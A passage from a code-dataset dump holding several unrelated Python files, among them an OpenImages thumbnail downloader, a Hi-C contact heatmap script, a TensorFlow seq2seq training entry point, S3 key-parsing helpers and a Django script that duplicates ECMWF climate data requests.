np.arange(10)\r\n w = 0.3\r\n # training accuracy\r\n print('training accuracy')\r\n plt.bar(x, accuracy_train, width=w, color='g')\r\n plt.ylim(0.95,1)\r\n plt.show()\r\n plt.savefig('Final_SVM_Training_accuracy.png')\r\n plt.close()\r\n \r\n # testing accuracy\r\n print('testing accuracy')\r\n plt.bar(x, accuracy_test, width=w, color='g')\r\n plt.ylim(0.95,1)\r\n plt.show()\r\n plt.savefig('Final_SVM_Testing_accuracy.png')\r\n plt.close()\r\n \r\n return finalSVM","sub_path":"IndividualProject/final/CNN_classifier/load_finalSVM.py","file_name":"load_finalSVM.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"147077592","text":"temp = print(\"Enter the number of current temperature bellow:\")\r\nwhile isinstance(temp, int) !=True:\r\n try: \r\n temp = int(input(\"Temperature: \"))\r\n except:\r\n print(\"Not a valid temperature!\")\r\nif temp <= 0:\r\n form = \"Solid\"\r\nelif 1 <= temp <= 99:\r\n form = \"Liquid\"\r\nelse:\r\n form = \"Gas\"\r\nprint(\"At\",str(temp)+\"°C, water will be a\",form)\r\n","sub_path":"Python/PYTHONchallenges/Python/Python/challenges/Python Tasks/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"557219833","text":"import csv\nimport subprocess\nimport os\nfrom tqdm import tqdm\nimport pandas as pd\nimport urllib.request\nfrom func_timeout import func_set_timeout\nimport time\nimport datetime\nimport func_timeout\n# import config\npicture = [\"jpg\",\"JPEG\",\"PNG\",\"png\"]\n\ndef setup_logger(log_file_path: str = None):\n import logging\n from colorlog import ColoredFormatter\n logging.basicConfig(filename=log_file_path, format='%(asctime)s %(levelname)-8s %(filename)s: %(message)s',\n # 定义输出log的格式\n datefmt='%Y-%m-%d %H:%M:%S', )\n \"\"\"Return a logger with a default ColoredFormatter.\"\"\"\n formatter = ColoredFormatter(\"%(asctime)s %(log_color)s%(levelname)-8s %(reset)s %(filename)s: %(message)s\",\n datefmt='%Y-%m-%d %H:%M:%S',\n reset=True,\n log_colors={\n 'DEBUG': 'blue',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n })\n\n logger = logging.getLogger('project')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n logger.info('logger init finished')\n return logger\n\nclass open_image_dataset:\n def __init__(self):\n self.test_annotations_human = 
'/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Human-verified_labels/test-annotations-human-imagelabels.csv'\n self.validation_annotations = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Human-verified_labels/validation-annotations-human-imagelabels.csv'\n self.train_annotations = \"/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Human-verified_labels/oidv6-train-annotations-human-imagelabels.csv\"\n\n self.Trainable = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/9600.csv'\n\n self.label_to_path = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Image_IDs/oidv6-train-images-with-labels-with-rotation.csv'\n self.train_label_to_path_list = pd.read_csv(self.label_to_path)\n\n self.label_to_path_val = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Image_IDs/validation-images-with-rotation.csv'\n self.val_label_to_path_list = pd.read_csv(self.label_to_path_val)\n\n self.path = \"/data/glusterfs_cv_04/public_data/imagenet/OpenImage\"\n\n self.class_descriptions = \"/data/glusterfs_cv_04/public_data/imagenet/OpenImage/oidv6-class-descriptions.csv\"\n self.class_descriptions_list = pd.read_csv(self.class_descriptions)\n\n def find_right_class(self):\n test_image_label = pd.read_csv(self.test_annotations_human)\n test_class_list = test_image_label[\"LabelName\"].unique()\n\n val_image_label = pd.read_csv(self.validation_annotations)\n val_class_list = val_image_label[\"LabelName\"].unique()\n\n train_image_label = pd.read_csv(self.train_annotations)\n train_class_list = train_image_label[\"LabelName\"].unique()\n\n Trainable_label = pd.read_csv(self.Trainable)\n Trainable_class_list = Trainable_label[\"/m/01g317\"].unique()\n\n final_class_list = list(\n set(test_class_list).intersection(val_class_list, train_class_list, Trainable_class_list))\n return final_class_list, train_image_label, val_image_label, test_image_label\n\n @func_set_timeout(50)\n def get_train_url(self,one_image_id,class_path):\n one_path = list(self.train_label_to_path_list[self.train_label_to_path_list[\"ImageID\"] == one_image_id][\n \"Thumbnail300KURL\"])[0]\n\n try:\n file_suffix = one_path.split('/')[-1]\n if file_suffix.split(\".\")[-1] not in picture:\n logger.info(\"invalid image url:\"+one_path)\n return 0\n except:\n logger.info(\"invalid image url:\"+str(one_path))\n return 0\n\n\n filename = class_path + \"/\" + file_suffix\n try:\n urllib.request.urlretrieve(one_path, filename=filename)\n except:\n logger.info(\"invalid image url:\"+one_path)\n return 0\n return 0\n\n @func_set_timeout(50)\n def get_val_url(self, one_image_id, class_path):\n one_path = list(self.val_label_to_path_list[self.val_label_to_path_list[\"ImageID\"] == one_image_id][\n \"Thumbnail300KURL\"])[0]\n\n try:\n file_suffix = one_path.split('/')[-1]\n if file_suffix.split(\".\")[-1] not in picture:\n logger.info(\"invalid image url:\" + one_path)\n return 0\n except:\n logger.info(\"invalid image url:\" + str(one_path))\n return 0\n\n filename = class_path + \"/\" + file_suffix\n try:\n urllib.request.urlretrieve(one_path, filename=filename)\n except:\n logger.info(\"invalid image url:\" + one_path)\n return 0\n return 0\n\n def download_url(self,class_path,one_class_list):\n\n for i,(one_image_id) in tqdm(enumerate(one_class_list)):\n logger.info(\" download picture\"+one_image_id)\n try:\n self.get_train_url(one_image_id,class_path)\n except func_timeout.exceptions.FunctionTimedOut:\n logger.info('Timed out!')\n continue\n\n if i > 600:\n break\n\n def 
download_url_val(self,class_path,one_class_list):\n\n for i,(one_image_id) in tqdm(enumerate(one_class_list)):\n logger.info(\" download picture\"+one_image_id)\n try:\n self.get_val_url(one_image_id,class_path)\n except func_timeout.exceptions.FunctionTimedOut:\n logger.info('Timed out!')\n continue\n\n if i > 50:\n break\n\n def download_train_image(self):\n class_list, train_image_label, val_image_label, test_image_label = self.find_right_class()\n logger.info(\"-------------------start download train data------------------\")\n logger.info(\" class number: {:.1f}\".format(len(class_list)))\n for class_one in class_list:\n DisplayName = \\\n list(self.class_descriptions_list[self.class_descriptions_list[\"LabelName\"] == class_one][\"DisplayName\"])[0]\n logger.info(\"-------------------start download new class------------------\")\n logger.info(\" LabelName: \"+class_one+\" DisplayName:\"+DisplayName)\n\n same_class = train_image_label[train_image_label[\"LabelName\"] == class_one]\n confidence = same_class[same_class[\"Source\"] == \"verification\"]\n one_class_list_clean = list(confidence[confidence[\"Confidence\"] == 1][\"ImageID\"])\n one_class_list_noise = list(confidence[confidence[\"Confidence\"] == 0][\"ImageID\"])\n if len(one_class_list_clean)>2000:\n logger.info(\" warning: invalid class\")\n continue\n\n logger.info(\" all sample number : {:.1f}\".format(len(confidence[\"ImageID\"])))\n logger.info(\" Clean sample number : {:.1f}\".format(len(one_class_list_clean))+\" Noise sample number: {:.1f}\".format(len(one_class_list_noise)))\n\n # one_class_list = list(train_image_label[train_image_label[\"LabelName\"] == class_one][\"ImageID\"])\n logger.info(\"-------------------start download clean dataset------------------\")\n class_path = os.path.join(self.path, \"train\",\"clean\", class_one.split(\"/\")[-1])\n if not os.path.exists(class_path):\n os.makedirs(class_path)\n else:\n continue\n self.download_url(class_path,one_class_list_clean)\n\n logger.info(\"-------------------start download noise dataset------------------\")\n class_path = os.path.join(self.path, \"train\",\"noise\", class_one.split(\"/\")[-1])\n if not os.path.exists(class_path):\n os.makedirs(class_path)\n else:\n continue\n self.download_url(class_path, one_class_list_noise)\n\n def download_val_image(self):\n class_list, train_image_label, val_image_label, test_image_label = self.find_right_class()\n logger.info(\"-------------------start download val data------------------\")\n logger.info(\" class number: {:.1f}\".format(len(class_list)))\n\n class_path = os.path.join(self.path, \"train\", \"clean\")\n train_class_list = os.listdir(class_path)\n for class_one in class_list:\n\n if class_one.split(\"/\")[-1] not in train_class_list:\n continue\n\n DisplayName = \\\n list(self.class_descriptions_list[self.class_descriptions_list[\"LabelName\"] == class_one][\"DisplayName\"])[0]\n logger.info(\"-------------------start download new class------------------\")\n logger.info(\" LabelName: \"+class_one+\" DisplayName:\"+DisplayName)\n\n same_class = val_image_label[val_image_label[\"LabelName\"] == class_one]\n confidence = same_class[same_class[\"Source\"] == \"verification\"]\n one_class_list_clean = list(confidence[confidence[\"Confidence\"] == 1][\"ImageID\"])\n\n logger.info(\" all sample number : {:.1f}\".format(len(confidence[\"ImageID\"])))\n logger.info(\" Clean sample number : {:.1f}\".format(len(one_class_list_clean)))\n\n logger.info(\"-------------------start download 
dataset------------------\")\n class_path = os.path.join(self.path, \"val\", class_one.split(\"/\")[-1])\n if not os.path.exists(class_path):\n os.makedirs(class_path)\n else:\n continue\n self.download_url_val(class_path,one_class_list_clean)\n\n\n\nlogger = setup_logger(os.path.join(\"/data/glusterfs_cv_04/11121171/AAAI_NL/Baseline_classification/classification_open_image/datasets\", 'train_val_log'))\ndataset=open_image_dataset()\ndataset.download_val_image()\n\n","sub_path":"datasets/download_openimage_eval.py","file_name":"download_openimage_eval.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"72935370","text":"from new_data_prep import remove_cols, ids_columns, prep_data, load_train, load_test, find_statistics\n\nprep_data()\nX = load_train()\nprint(len(X.columns))\n#remove_cols(ids_columns, 'no_ids.csv'\n\n# train_df = load_train()\n# test_df = load_test()\n# tr, test = find_statistics('district_id', train_df, test_df)\n\n\nfor nn in X.columns:\n z = X[nn]\n print(f'{nn}: max = {z.max()} min = {z.min()} uniq = {len(z.unique())}')","sub_path":"new_ufek.py","file_name":"new_ufek.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"548331021","text":"import cooler\r\nimport sys\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\r\nclr = cooler.Cooler(sys.argv[1])\r\n# clr = cooler.Cooler('XXtrans.cool')\r\nchrom_sizes_bins=(clr.chromsizes // clr.binsize).tolist()\r\nchrom_size_matrix = [ [0]*24 for i in range(24) ]\r\nfor i in range(24):\r\n for j in range(24):\r\n chrom_size_matrix[i][j] = chrom_sizes_bins[i]*chrom_sizes_bins[j]\r\ndf_chrom_size_matrix = pd.DataFrame(data=chrom_size_matrix)\r\nmtx = clr.matrix(balance=True, as_pixels=True, join=True)\r\nmtx = pd.DataFrame(data=clr.matrix(balance=True, as_pixels=True, join=True)[:,:])\r\nmtx['balanced'] = mtx['balanced'].fillna(value=0)\r\nmtx = mtx.drop(columns=['start1','end1','start2','end2','count'])\r\ntrans_contacts = mtx[mtx['chrom1'] != mtx['chrom2']]\r\nsum = trans_contacts.groupby(by=['chrom1','chrom2']).sum()\r\nsum.to_csv(sys.argv[1] + '.csv')\r\nsum = pd.read_csv(sys.argv[1] + '.csv')\r\n# sum = pd.read_csv('XXtrans.cool' + '.csv')\r\nnew_indexes=['chr1','chr2', 'chr3', 'chr4', 'chr5','chr6','chr7','chr8','chr9','chr10','chr11','chr12','chr13','chr14',\r\n'chr15','chr16','chr17','chr18','chr19','chr20','chr21','chr22','chrX','chrY']\r\nsum = sum.pivot(index='chrom1',columns='chrom2')\r\nsum.columns= sum.index\r\nsum = sum.where(sum!=0, sum.T)\r\nsum = sum.reindex(index=new_indexes,columns=new_indexes)\r\nsum = pd.DataFrame(sum.values/df_chrom_size_matrix.values, columns=new_indexes, index=new_indexes)\r\nsum.to_csv(sys.argv[1] + '.csv')\r\nplt.cla()\r\nfig = sns.heatmap(data=sum,cmap='Reds')\r\nfig.figure.savefig(sys.argv[1] + '.png')\r\n","sub_path":"get_sparce.py","file_name":"get_sparce.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"568752405","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n @Author: ShiLou\n @Time: 上午10:20\n @Description: \n\"\"\"\nfrom __future__ import print_function, division\nimport tensorflow as tf\nimport ConfigParser\nimport numpy as np\nfrom src.conv2seq_model import Conv2Model\nfrom src.seq2seq_model import Seq2SeqModel\nfrom src.data_helper import DataHelper\n# from src.units import Units\n# from pyrouge import Rouge155\n# from src.ROUGE import PythonROUGE\nimport os\nimport time\n\n\n# units = Units()\n\ndef build_flag():\n config = ConfigParser.ConfigParser()\n config.read('config.ini')\n tf.flags.DEFINE_integer('batch_size', config.get('MODEL', 'batch_size'), 'size of one batch')\n tf.flags.DEFINE_integer('max_box_len', config.get('MODEL', 'max_box_len'), 'maximum length of fields and values')\n tf.flags.DEFINE_integer('max_sum_len', config.get('MODEL', 'max_sum_len'), 'maximum length of summaries')\n tf.flags.DEFINE_integer('hidden_size', config.get('MODEL', 'hidden_size'), 'size of hidden layer')\n tf.flags.DEFINE_string('filter_sizes', config.get('MODEL', 'filter_sizes'), 'size of convolution kernels')\n tf.flags.DEFINE_integer('filter_nums', config.get('MODEL', 'filter_nums'), 'convolution kernel number')\n tf.flags.DEFINE_float('lr', config.get('MODEL', 'learning_rate'), 'learning rate')\n tf.flags.DEFINE_float('clip_grads', config.get('MODEL', 'clip_grads'), 'gradient clip coefficient')\n tf.flags.DEFINE_integer('epoch_nums', config.get('MODEL', 'epoch_nums'), 'numbers of epoch')\n tf.flags.DEFINE_integer('batch_print', config.get('MODEL', 'batch_print'), 'print per X batch.')\n tf.flags.DEFINE_integer('vocab_size', config.get('EMBEDDING', 'vocab_size'), 'vocabulary size')\n tf.flags.DEFINE_integer('vocab_ex', config.get('EMBEDDING', 'vocab_ex'), 'size of vocabulary with content words.')\n tf.flags.DEFINE_integer('vocab_dim', config.get('EMBEDDING', 'vocab_dim'), 'vocab embedding dimension')\n tf.flags.DEFINE_integer('field_size', config.get('EMBEDDING', 'field_size'), 'field table size')\n tf.flags.DEFINE_integer('field_dim', config.get('EMBEDDING', 'field_dim'), 'field embedding dimension')\n tf.flags.DEFINE_string('checkpointDir', 'model/model', 'checkpoint path')\n tf.flags.DEFINE_boolean('field', config.getboolean('EMBEDDING', 'field'), 'whether to use field embedding or not')\n tf.flags.DEFINE_string('mode', config.get('MODEL', 'mode'), 'train, predict, test or debug mode with little data.')\n tf.flags.DEFINE_integer('att_size', config.getint('MODEL', 'att_size'), 'hidden size of attention layer.')\n tf.flags.DEFINE_integer('epoch_dev', config.getint('MODEL', 'epoch_dev'), 'epoch numbers of development.')\n tf.flags.DEFINE_integer('seed', config.getint('MODEL', 'seed'), 'random seed, set 0 to do not use.')\n tf.flags.DEFINE_integer('pad', 0, 'id of \"\" in the vocabulary, DO NOT MODIFY!')\n tf.flags.DEFINE_integer('cnn', config.getboolean('MODEL', 'cnn'), 'Use cnn_state as extra decoder input.')\n tf.flags.DEFINE_float('dropout', config.getfloat('MODEL', 'dropout'), 'CNN dropout rate.')\n tf.flags.DEFINE_boolean('attention', config.getboolean('MODEL', 'attention'), 'If use attention, set it be True.')\n tf.flags.DEFINE_string('tables', None, 'ODPS tables.')\n return tf.flags.FLAGS\n\n\nFLAGS = build_flag()\n\n\n# def evaluate():\n# r = Rouge155()\n# # set directories\n# r.system_dir = 'to_evaluate/hypothesis/'\n# r.model_dir = 'to_evaluate/reference/'\n#\n# # define the patterns\n# r.system_filename_pattern = 'hypothesis_test_(\\d+).txt'\n# r.model_filename_pattern = 
'reference_test_#ID#.txt'\n#\n# # use default parameters to run the evaluation\n# output = r.convert_and_evaluate()\n# print(output)\n# output_dict = r.output_to_dict(output)\n# print(output_dict['rouge_4_f_score'])\n\n\ndef debug():\n model = Seq2SeqModel(FLAGS)\n if FLAGS.cnn:\n cnn_max_len = FLAGS.max_box_len\n else:\n cnn_max_len = None\n dh = DataHelper(FLAGS.vocab_size, FLAGS.vocab_ex, FLAGS.field_size,\n mode=FLAGS.mode, cnn_max_len=cnn_max_len,\n tables=FLAGS.tables)\n dh.create_batch(batch_size=FLAGS.batch_size,\n max_box_len=FLAGS.max_box_len,\n max_sum_len=FLAGS.max_sum_len)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n\n # remove old tensorboard log.\n # all_files = os.listdir('model_log')\n # for f in all_files:\n # if f.startswith('events.out.tfevents.'):\n # os.remove(os.path.join(os.path.abspath('model_log'), f))\n\n with tf.Session(config=config) as sess:\n # writer = tf.summary.FileWriter('model_log/', sess.graph)\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n\n vars = tf.all_variables()\n print(\"all trainable variables: \")\n for v in vars:\n print(v)\n\n for epoch in range(FLAGS.epoch_nums):\n sess.graph.finalize()\n print('===========================epoch %d===========================' % epoch)\n batch_loss = 0\n for i in range(dh.batch_num):\n batch = dh.next_batch()\n oov_dic_rev = batch['oov_dic_rev']\n # batch_loss += model.summary(sess, batch, i, writer)\n batch_loss += model.train(sess, batch)\n\n if i == 0:\n print('===========================print===========================')\n g = model.generate(sess, batch)\n content_to_word = []\n for x in batch['content_in'][0]:\n if x in oov_dic_rev and oov_dic_rev[x] == '':\n break\n elif x in oov_dic_rev:\n content_to_word.append(oov_dic_rev[x])\n else:\n content_to_word.append(oov_dic_rev[''])\n\n content_in = reduce(lambda x, y: x + ' ' + y, content_to_word)\n\n syn_to_word = map(lambda x: oov_dic_rev[x] if x in oov_dic_rev else oov_dic_rev[''],\n g[0])\n syn = reduce(lambda x, y: x + ' ' + y, syn_to_word)\n ref = batch['summary'][0]\n print('Content in:\\n%s\\nRef:\\n%s\\nSyn:\\n%s\\n'\n % (content_in, ref, syn))\n oov_words = [oov_dic_rev[x]\n for x in g[0]\n if x >= FLAGS.vocab_size and x < FLAGS.vocab_ex]\n print('OOV words: %s ' % oov_words)\n\n if i > 0 and i % FLAGS.batch_print == 0:\n print('%s\\t[epoch-%d batch-%d]\\tloss: %.4f'\n % (time.strftime('%m.%d %H:%M:%S', time.localtime()),\n epoch, i, batch_loss / FLAGS.batch_print))\n batch_loss = 0\n\n saver.save(sess, FLAGS.checkpointDir)\n print('saved.')\n\n\nif __name__ == '__main__':\n if FLAGS.mode.lower() == 'debug':\n debug()\n elif FLAGS.mode.lower() == 'train':\n train_model()\n elif FLAGS.mode.lower() == 'test':\n evaluate()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"580258759","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport neural_network_from_scratch as nnfs\n\niter = 100\nX = np.array([[0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1]])\ny = np.array([[1], [.5], [1], [.8]])\nnn = nnfs.NeuralNetwork(X, y)\nLoss = np.zeros((iter))\nfor i in range(iter):\n nn.feedforward()\n nn.backprop()\n Loss[i] = abs(nn.output[0] - nn.y[0])\n\nyp = np.round(nn.output, 4)\nxyyp = np.concatenate((X, y, yp), axis=1)\ncolumns = ('X1', 'X2', 'X3', 'Y', 'Yp')\nxy = np.concatenate((X, y, yp), axis=1)\nfig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(6, 
5.4))\ntprw = [\"#0000ff\", \"#0000ff\", \"#0000ff\", \"#009933\"]\ndrw = [\"#6699ff\", \"#6699ff\", \"#6699ff\", \"#66ff33\", \"#66ff33\"]\nlrw = [\"#6699ff\", \"#6699ff\", \"#6699ff\", \"#99ff66\", \"#99ff66\"]\ncolors = [lrw, drw, lrw, drw]\n\nthe_table = ax1.table(cellText=xy, cellColours=colors,\n colLabels=columns, loc='center')\nthe_table.set_fontsize(16)\nthe_table.scale(1, 2)\nax2.plot(Loss)\nax2.set_title('Loss after '+str(iter)+' iterations')\nplt.tight_layout()\nplt.savefig(str(iter)+'iter_complex.png')\n","sub_path":"ToyNeuralNetwork/PlaywithNN_complex.py","file_name":"PlaywithNN_complex.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450756501","text":"from typing import List, Tuple\n\nfrom app.models.public import AboutAllModel\n\ndef get_specific_keys_from_content_list(content_list, **kwargs) -> List:\n '''\n Accept raw list of content\n Return list with only speficic keys\n \n Available keys:\n 'Key'\n 'LastModified'\n 'ETag'\n 'Size'\n 'StorageClass'\n '''\n\n object_data = {}\n parsed = []\n for content in content_list:\n for key, value in kwargs.items():\n if value == True:\n object_data[key] = content[key]\n parsed.append(object_data)\n object_data = {}\n \n return parsed\n\n\ndef get_names_from_keys(content_list) -> List:\n '''\n Accepts\n List of Dicts:\n [{\n Key: \"some/key/here/image.jpg\"\n }]\n\n Returns:\n Dict:\n {\n \"some/key/here/image.jpg\" : \"image.jpg\"\n }\n '''\n\n parsed = {}\n for content in content_list:\n name = content['Key'].split('/')[-1]\n if '.' in name:\n parsed[content['Key']] = name\n\n return parsed\n\ndef get_order_from_keys(content_list) -> Tuple:\n '''\n Accepts\n List of Dicts:\n [{\n Key: \"some/key/here/0001.jpg\"\n }]\n\n Returns:\n Tuple(\n Dict:\n {\n \"some/key/here/0001.jpg\" : 1\n }\n List:\n Dict: \n {\n 'Key': \"some/key/here/image.jpg\"\n }\n )\n '''\n\n parsed = {}\n delete = {}\n for_deletion = []\n for content in content_list:\n name = content['Key'].split('/')[-1]\n if '.' 
in name:\n try:\n parsed[content['Key']] = int(name.split('.')[0])\n except:\n delete['Key'] = content['Key'] \n for_deletion.append(delete)\n delete = {}\n\n return (parsed, for_deletion)\n\ndef filter_prefix(prefix, content_list, exclude_root=True) -> List:\n '''\n Filters list of elements by prefix\n\n :params:\n prefix - prefix to filter by\n content_list - list to filter\n exclude_root: True - exclude root directory\n\n Returns list of Dict:\n [\n {\n 'Key' : 'object_key_in_cdn'\n }\n ]\n '''\n filtered = []\n prefix = prefix if prefix[-1] == '/' else prefix + '/'\n for content in content_list:\n if prefix in content['Key']:\n if not exclude_root:\n filtered.append(content)\n elif prefix != content['Key']:\n filtered.append(content)\n\n return filtered\n\n\ndef list_root_directory_files(prefix, content_list, exclude_root=True, exclude_files=[]) -> List:\n '''\n Return only files from directory\n\n :params:\n prefix - directory prefix to filter\n content_list - list to filter\n exclude_root: True - exclude directory itself\n exclude_files: List of filed to be excluded by key\n Returns list of Dict:\n [\n {\n 'Key' : 'object_key_in_cdn'\n }\n ]\n '''\n filtered = []\n prefix = prefix if prefix[-1] == '/' else prefix + '/'\n \n for content in content_list:\n if prefix in content['Key'] and prefix != content['Key']:\n if '/' not in content['Key'].split(prefix)[1]:\n if content['Key'] not in exclude_files:\n filtered.append(content)\n elif not exclude_files:\n filtered.append(content)\n\n if not exclude_root:\n filtered.append({\"Key\": prefix})\n\n return filtered\n\n\ndef check_key_exists_in_list_of_objects(key, list_of_objects) -> bool:\n\n for object_key in list_of_objects:\n if key == object_key['Key']:\n return True\n\n print(f\"Didn't find key {key} in \\n {list_of_objects}\") \n return False\n\ndef get_prefix_by_inner_key(key: str) -> str:\n\n sufix = key.split(\"/\")[-1]\n \n return key.replace(sufix, '')\n\ndef about_keys_from_list_of_objects(list_: List[AboutAllModel]):\n list_of_keys = [{\"Key\": about_object.background_key} for about_object in list_]\n\n return list_of_keys\n","sub_path":"backend/server/app/cloud/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509364064","text":"from api.mms.mms_ import Mms\n\n\nclass AgreeRefundV2(Mms):\n method = 'post'\n api = '/api/aftersale/agreeRefundV2'\n data = {\n \"order_id\": \"1631439211248795650\",\n \"refund_desc\": \"\"\n }\n\n error_resp = {\n 'code': 400000,\n 'message': '没有可以购买的商品'\n }\n\n expected_schema = {\n \"$schema\": \"http://json-schema.org/draft-06/schema\",\n \"type\": \"object\",\n \"title\": \"The root schema\",\n \"required\": [\n \"code\",\n \"payload\"\n ],\n \"properties\": {\n \"code\": {\n \"type\": \"integer\",\n \"title\": \"The code schema\"\n },\n \"payload\": {\n \"type\": \"object\",\n \"title\": \"The payload schema\",\n \"required\": [\n \"order_id\",\n \"refund_status\"\n ],\n \"properties\": {\n \"order_id\": {\n \"type\": \"string\",\n \"title\": \"The order_id schema\"\n },\n \"refund_status\": {\n \"type\": \"integer\",\n \"title\": \"The refund_status schema\"\n }\n }\n }\n }\n }\n","sub_path":"banshee-master/api/mms/refund/agree_refund.py","file_name":"agree_refund.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"154377414","text":"#!/usr/bin/env 
python\n\"\"\"\nupdate_dreqs_0103.py\n\nThis file adds all existing ECMWF data requests to the following:\nECMWF-IFS-MR hist-1950 r2i1p1f1\nECMWF-IFS-MR hist-1950 r3i1p1f1\n\nECMWF-IFS-HR hist-1950 r5i1p1f1\nECMWF-IFS-HR hist-1950 r6i1p1f1\n\nECMWF-IFS-HR highresSST-present r2i1p1f1\nECMWF-IFS-HR highresSST-present r3i1p1f1\nECMWF-IFS-HR highresSST-present r4i1p1f1\nECMWF-IFS-HR highresSST-present r5i1p1f1\nECMWF-IFS-HR highresSST-present r6i1p1f1\n\nECMWF-IFS-LR hist-1950 r2i1p1f1\nECMWF-IFS-LR hist-1950 r3i1p1f1\nECMWF-IFS-LR hist-1950 r4i1p1f1\nECMWF-IFS-LR hist-1950 r5i1p1f1\nECMWF-IFS-LR hist-1950 r6i1p1f1\nECMWF-IFS-LR hist-1950 r7i1p1f1\nECMWF-IFS-LR hist-1950 r8i1p1f1\n\nECMWF-IFS-LR highresSST-present r2i1p1f1\nECMWF-IFS-LR highresSST-present r3i1p1f1\nECMWF-IFS-LR highresSST-present r4i1p1f1\nECMWF-IFS-LR highresSST-present r5i1p1f1\nECMWF-IFS-LR highresSST-present r6i1p1f1\nECMWF-IFS-LR highresSST-present r7i1p1f1\nECMWF-IFS-LR highresSST-present r8i1p1f1\n\"\"\"\nimport argparse\nimport logging.config\nimport os\nimport sys\n\nfrom cf_units import date2num, CALENDAR_GREGORIAN\n\nimport django\ndjango.setup()\nfrom pdata_app.models import ClimateModel, DataRequest, Experiment\nfrom pdata_app.utils.common import delete_drs_dir\n\n__version__ = '0.1.0b1'\n\nDEFAULT_LOG_LEVEL = logging.WARNING\nDEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'\n\nlogger = logging.getLogger(__name__)\n\n\ndef delete_files(query_set):\n \"\"\"\n Delete any files online from the specified queryset\n \"\"\"\n directories_found = []\n for df in query_set:\n if df.online:\n try:\n os.remove(os.path.join(df.directory, df.name))\n except OSError as exc:\n logger.error(str(exc))\n sys.exit(1)\n else:\n if df.directory not in directories_found:\n directories_found.append(df.directory)\n df.online = False\n df.directory = None\n df.save()\n\n for directory in directories_found:\n if not os.listdir(directory):\n delete_drs_dir(directory)\n logger.debug('{} directories removed'.format(len(directories_found)))\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Add additional data requests')\n parser.add_argument('-l', '--log-level', help='set logging level to one of '\n 'debug, info, warn (the default), or error')\n parser.add_argument('--version', action='version',\n version='%(prog)s {}'.format(__version__))\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n \"\"\"\n Main entry point\n \"\"\"\n # MR hist-1950\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 4)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-MR',\n experiment__short_name='hist-1950',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} MR hist-1950 {} data requests created.'.\n format(num_created, var_lab))\n\n # HR hist-1950\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(5, 7)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-HR',\n experiment__short_name='hist-1950',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} HR hist-1950 {} data requests created.'.\n format(num_created, var_lab))\n\n # HR highresSST-present\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 7)]:\n data_reqs = DataRequest.objects.filter(\n 
climate_model__short_name='ECMWF-IFS-HR',\n            experiment__short_name='highresSST-present',\n            rip_code='r1i1p1f1'\n        )\n        num_created = 0\n        for data_req in data_reqs:\n            data_req.id = None\n            data_req.rip_code = var_lab\n            data_req.save()\n            num_created += 1\n        logger.debug('{} HR highresSST-present {} data requests created.'.\n                     format(num_created, var_lab))\n\n    # LR hist-1950\n    for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 9)]:\n        data_reqs = DataRequest.objects.filter(\n            climate_model__short_name='ECMWF-IFS-LR',\n            experiment__short_name='hist-1950',\n            rip_code='r1i1p1f1'\n        )\n        num_created = 0\n        for data_req in data_reqs:\n            data_req.id = None\n            data_req.rip_code = var_lab\n            data_req.save()\n            num_created += 1\n        logger.debug('{} LR hist-1950 {} data requests created.'.\n                     format(num_created, var_lab))\n\n    # LR highresSST-present\n    for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 9)]:\n        data_reqs = DataRequest.objects.filter(\n            